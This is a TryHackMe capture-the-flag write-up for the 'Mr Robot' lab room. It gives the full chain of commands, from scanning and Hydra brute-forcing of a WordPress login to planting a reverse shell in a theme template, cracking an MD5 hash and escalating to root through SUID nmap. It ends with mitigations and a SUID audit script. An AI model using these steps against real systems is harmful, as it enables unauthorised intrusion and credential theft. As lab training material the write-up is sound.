Mr Robot CTF

Enumerate services, scan TCP/UDP ports, exploit WordPress vulnerabilities, and escalate privileges to capture flags in this Mr. Robot-themed CTF.

Mr Robot CTF - TryHackMe Writeup

Mr Robot CTF is a beginner-friendly CTF room inspired by the Mr. Robot TV series. This room focuses on web enumeration, WordPress exploitation, and Linux privilege escalation.

Difficulty: Easy ⭐
Operating System: Linux (Ubuntu)
Themes: Web Enumeration, WordPress, Password Cracking, SUID Privilege Escalation


Objectives

  1. Enumerate web services and discover hidden files
  2. Exploit WordPress authentication vulnerabilities
  3. Gain initial shell access
  4. Escalate privileges to root
  5. Capture all three flags

Reconnaissance

Nmap Scan

Started with a comprehensive port scan:

nmap -p- -sCV -oA MrRobot-Nmap 10.10.186.36

Results:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
80/tcp  open  http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).

Key Findings:

  • Port 22: SSH service
  • Ports 80/443: Web servers running Apache

Web Enumeration

Directory Discovery with Gobuster

gobuster dir --url http://10.10.74.251 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Important Discoveries:

  • /robots - Contains flag hints and wordlist
  • /wp-login - WordPress login page
  • /readme - System information
  • /license - Licensing information
  • /phpmyadmin - Database administration (403 Forbidden)

Flag 1 Discovery

Accessed /robots.txt, which contained:

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-login/
Disallow: /readme.html
Disallow: /license.txt
Disallow: /key-1-of-3.txt

Flag 1 Captured:
Accessed /key-1-of-3.txt to obtain the first flag.

Additional Discovery:
Found fsocity.dic - A wordlist file that would be useful for brute-force attacks.

WordPress Discovery

Found the WordPress login page at /wp-login.php.

Initial Access

Username Enumeration

Used Hydra to enumerate valid usernames:

# ^USER^ and ^PASS^ are Hydra's placeholders (^PWD^ is not recognised and would be sent literally)
hydra -L fsocity.dic -p test 10.10.186.36 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username" -t 30

Result: Found username Elliot

Password Brute-Force

hydra -l Elliot -P fsocity.dic 10.10.186.36 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30

Credentials Found:

  • Username: Elliot
  • Password: ER28-0652

WordPress Admin Access

Logged into WordPress dashboard with discovered credentials.

Reverse Shell Deployment

  1. Navigate to Theme Editor:
    • Appearance → Editor → 404.php
  2. Insert PHP Reverse Shell: Used the PentestMonkey PHP reverse shell
  3. Start Listener:
    nc -nlvp 9999
  4. Trigger Shell: Accessed a non-existent page to trigger the 404 template

Shell Obtained

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Lateral Movement

User Enumeration

ls /home
# Output: robot

Credential Discovery

Found in /home/robot:

cd /home/robot
ls
# Output: key-2-of-3.txt  password.raw-md5

MD5 Hash Content:

robot:c3fcd3d76192e4007dfb496cca67e13b

Password Cracking

john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt

Password Found: abcdefghijklmnopqrstuvwxyz

User Switch

su robot
Password: abcdefghijklmnopqrstuvwxyz

Flag 2 Capture

python -c 'import pty; pty.spawn("/bin/bash")'
cat key-2-of-3.txt

Flag 2 Captured


Privilege Escalation

SUID Binary Enumeration

find / -perm -u=s -type f 2>/dev/null

Notable Finding:

/usr/local/bin/nmap

Nmap SUID Exploitation

Referenced the GTFOBins entry for nmap.

Exploitation:

nmap --interactive
nmap> !sh
whoami
# Output: root

Flag 3 Capture

cat /root/key-3-of-3.txt

Flag 3 Captured


Key Takeaways

Attack Path Summary:

Port Scanning → Web Enumeration → Robots.txt Discovery →
WordPress Login → Hydra Brute-Force → WordPress Admin Access →
Theme Editor Exploit → Reverse Shell → Credential Discovery →
Password Cracking → User Switch → SUID Enumeration →
Nmap Exploitation → Root Access

Vulnerabilities Exploited:

  1. Information Disclosure - Sensitive files in robots.txt
  2. Weak Password Policy - Crackable MD5 hash
  3. WordPress Misconfiguration - Theme editor access
  4. SUID Misconfiguration - Nmap with SUID permissions

Mitigation Strategies:

  1. For WordPress Security:
    • Disable theme/plugin editor
    • Implement strong password policies
    • Limit login attempts
    • Regular security updates
  2. For Linux Security:
    • Regular SUID binary audits
    • Principle of least privilege
    • Secure credential storage
    • Regular system updates
  3. For Web Security:
    • Restrict sensitive file access
    • Implement proper robots.txt
    • Regular security assessments
    • Input validation and sanitization
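The "regular SUID binary audits" item above is easy to automate. This added example (not from the writeup) walks a filesystem, collects regular files with the setuid bit, and diffs them against an expected baseline so that a stray /usr/local/bin/nmap shows up as an alert; EXPECTED_SUID is a constructed placeholder list, not a real distribution baseline.

```python
import os
import stat

# Constructed baseline: the SUID files you expect on this host. On a real system,
# build this from the distribution's package manifests rather than by hand.
EXPECTED_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount"}

def list_suid_files(root="/"):
    """Walk `root` and return every regular file with the setuid bit set."""
    found = set()
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []        # pseudo-filesystems: nothing to audit, slow to walk
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue              # unreadable, or vanished between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def unexpected_suid(found, expected=EXPECTED_SUID):
    """SUID files absent from the baseline; a stray /usr/local/bin/nmap lands here."""
    return sorted(set(found) - set(expected))

def missing_suid(found, expected=EXPECTED_SUID):
    """Baseline entries that are no longer SUID (tampering or a broken package)."""
    return sorted(set(expected) - set(found))

if __name__ == "__main__":
    suid = list_suid_files("/")
    for path in unexpected_suid(suid):
        print("ALERT unexpected SUID:", path)
    for path in missing_suid(suid):
        print("WARN baseline SUID file missing or no longer SUID:", path)
```

Run it from cron and diff the alert list against the previous run; the first run on a fresh install is what the baseline should be built from.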

Tools Used:

  • Nmap - Port scanning
  • Gobuster - Directory enumeration
  • Hydra - Password brute-forcing
  • JohnTheRipper - Password cracking
  • GTFOBins - Privilege escalation reference
  • Netcat - Reverse shell handling

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.